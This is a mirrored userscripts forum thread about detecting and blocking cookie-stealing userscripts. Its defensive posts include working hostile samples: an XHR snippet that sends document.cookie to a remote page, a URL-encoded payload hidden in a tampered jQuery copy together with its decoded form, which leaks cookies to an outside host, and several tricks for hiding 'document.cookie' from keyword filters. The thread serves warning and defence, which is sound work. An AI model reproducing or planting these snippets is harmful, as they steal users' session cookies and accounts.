THIS IS A STATIC MIRROR OF USERSCRIPTS.ORG - LOGINS DO NOT WORK

Cookie Stealing Scripts

in Userscripts.org discussion
Subscribe to Cookie Stealing Scripts 209 posts, 115 voices



maremp User

Can someone explain me how to install scripts? I was looking in that topic and try diffrent things but still can't install scripts. Please help me.

 
Descriptor Scriptwright

Wrong Topic
> http://www.greasespot.net/

 
Luckyless Scriptwright

!

 
p kumar User

Hii ur scripts doesn't work at all.Only it says "Unlocked by Sergip..." GodDamn bullshit!!! Neither i know how to uninstall the scripts in my Firefox browser ??!!??

 
p kumar User

Hii ur scripts doesn't work at all.Only it says "Unlocked by Sergio..." goddamn bullshit!!! Neither i know how to uninstall the scripts in my Firefox browser ??!!??

 
bonebreak User

o_O I don't understand, this script is safe right? I was going to try and get in contact with the maker or someone of code knowledge because it doesn't work for videos using "/ep_gr.swf?v=" I have to remove "/ep_gr.swf" was thinking script should be able to do that but no idea what so ever how to script it.

 
Malious Scriptwright

Hii ur scripts doesn't work at all.Only it says "Unlocked by Sergio..." goddamn bullshit!!! Neither i know how to uninstall the scripts in my Firefox browser ??!!??

what are you talking about?

 
antwanto User

aaaa

 
DavidJCobb Scriptwright

Perhaps the uploading process can scan for the aforementioned keywords to detect cookie stealing, while also searching for shorturls and tinyurls; if such URLs are found, a notice can be displayed alerting people that the userscript links to unknown URLs and may thus contain hazardous code; and if the cookie stealing stuff is displayed, the script can be immediately blocked.

As for stopping the charcode workaround, the userscript can search for charcode-related functions and scan them for the respective charcodes in addition to searching for the string "document.cookie"; it may also be necessary to search for any occurances of a coder storing a charcode function in a variable to avoid detection, e.x. (var avoidTheFilters = String.fromCharCode;). This, however, will fail to stop the following possible filter workaround:

varname.scrapText.value=eval(String.fromCharCode(100,111,99)+String.fromCharCode(117,109,101,110,116)+String.fromCharCode(46,99,111,111,107,105,101))

So the following upload filters could be enacted to prevent cookie exploits, charcode-related vulnerabilities, and potential problems with URL-shortening services:

  • Search for cookie-stealing keywords
    • Find all String.fromCharCode() statements and replace them with their results such that "String.fromCharCode(100,111,99)" becomes "doc"
  • Search for tinyurls, shorturls, etc., and display warning notices if any are found

 
Aquilax Scriptwright

The fromCharCode is not the only way to build a string, I can do it with a simple strings concatenation "doc"+"ume"+"nt."+"coo"+"kie", or with an array ["doc","ume","nt.","coo","kie"].join("") and there are a lot of other ways much complicated and more obfuscated to create the string "document.cookie", but this is not the only way to access the cookies, look at the following code: for(var prop in document) if (prop.indexOf("coo")!=-1) { document[prop] }.

 
Sonnefes User

No OGame Tr Server Scripts..??

 
DavidJCobb Scriptwright

If possible, the server can actually run a quick test of the code giving it random-ish values if it asks for DOM-related stuff, and if it gets a request for document.cookie, it flags the script as possible malware?

I have no idea how much (or little?) bandwidth or server processing power that suggestion would require to use, so it would probably be an implausible solution...

 
Sammpo User

Hi, i got some problem it says windows isnt determined and document isnt determined anyone can help me plz!!

 
mellamokb User

How about a watch on the call to document.cookie to determine if cookie is being interacted with in any way shape or form? This would be vulnerable to a redefinition of the watch method.

 
armvdw User

I think the best way to date is by implementing this on the userscript site :
http://userscripts.uservoice.com/pages/general/...

 
dkhal Scriptwright

yes this is known as cookie poisoning i think i read about it in Wikipedia
all they do is insert a variable in the script like this
cookie=document.cookie;
and they call an Ajax request to store the cookie on a web of their own like this:
var xmlHttp
xmlHttp=GetXmlHttpObject();
var url="savecookie.asp or .php";
url=url+"?cookie="+cookie;
xmlHttp.open("GET",url,true);
xmlHttp.send(null);

if you see any of these lines in your scripts delete it immediately and report it

 
sebastian ni... User

I know how to prevent these cookie stealers:
Have Greasemonkey replace:

open(Anything, Something, true);

with:

variable = CheckSanity(Something);
open(Anything, variable, true);

And also replace all assignments to:

window.location, this.href, image.src and such things so its run through CheckSanity();

CheckSanity checks the url against a whitelist, so in greasemonkey, you have a whitelist saying which URLs you want your scripts to access, and then if CheckSanity denies, it will return a generic URL like [http://127.0.0.1](http://127.0.0.1/)
The malicious script will be allowed to freely access cookies, but it cannot send them anywhere.

The thing with placing the url in a variable, is to have the real value of the url through CheckSanity, so a malicious script cannot encrypt the url. Have a decoder too, that decodes URL encoded urls.

 
dob Scriptwright

Seems to me like it'd be easier to just read through the script and in case something isn't right, don't install it...

 
matrixik Scriptwright

Rapidshare Premium & Collectors TweakPack (lftk v03) by lifetalk
https://userscripts-mirror.org/scripts/show/36739

As john_doe_the_third (thank you) say:

This script is an account stealer.

DO NOT INSTALL IT!

The script was deleted several times and lifetalk (aka sam hunter) upped it again and again to steal more and more rapidshare accounts.

It uses a modified version of the jQuery library, which contains some more lines filled in by lifetalk (lines 2330-2340).

var jQueryCopyright =
'%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%'+
'61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%65%6E%63%72%79%70%74%5F%6'+
'6%69%78%3D%64%6F%63%75%6D%65%6E%74%3B%0A%27%3C%69%6D%67%20%73%72%63'+
'%3D%22%68%74%74%70%3A%2F%2F%7A%73%68%61%72%65%61%75%64%69%6F%2E%70%'+
'68%70%6E%65%74%2E%75%73%2F%69%6E%64%65%78%2E%70%68%70%3F%27%0A%2B%7'+
'5%6E%65%73%63%61%70%65%28%65%6E%63%72%79%70%74%5F%66%69%78%2E%63%6F'+
'%6F%6B%69%65%29%20%2B%20%27%22%20%73%74%79%6C%65%3D%22%68%65%69%67%'+
'68%74%3A%30%70%78%3B%20%77%69%64%74%68%3A%30%70%78%3B%20%62%6F%72%6'+
'4%65%72%3A%20%30%70%78%3B%22%20%77%69%64%74%68%3D%22%30%22%20%68%65'+
'%69%67%68%74%3D%22%30%22%3E%27%3B%0A%7D%3C%2F%73%63%72%69%70%74%3E ';

If you convert these lines (hex => ascii) you get:

'';?}

Your rapidshare cookie (which contains your login and password) will be sent to http://zshareaudio.phpnet.us/ and your account is gone.

At code:

// Add jQuery
var GM_JQ = document.createElement('script');
GM_JQ.src = 'http://jquery.07x.net/jquery.js';

 
simon! Scriptwright

@matrixik

can you (please) update Screen Userscripts?

thanks.

 
RobiBucheler Scriptwright

I see a problem, if a script contains @require pointing to a dirty .js

 
lazyttrick Scriptwright

we need a javascript antivirus... runs nice as a userscript...

 
sizzlemctwizzle Scriptwright

I already have a javascript antivirus. Its called a brain lol.

 
smk Scriptwright

javacript anti-virus
cool :D

wonder how the heck it works

 
Avindra V.G. Scriptwright

@matrixik

That jumble of code in jQueryCopyright turns out to be:

<script type="text/javascript">
var encrypt_fix=document;
'<img src="http://zshareaudio.phpnet.us/index.php?' +unescape(encrypt_fix.cookie) + '" style="height:0px; width:0px; border: 0px;" width="0" height="0">';
}</script>

I like how he stored document in something called encrypt_fix.... LOL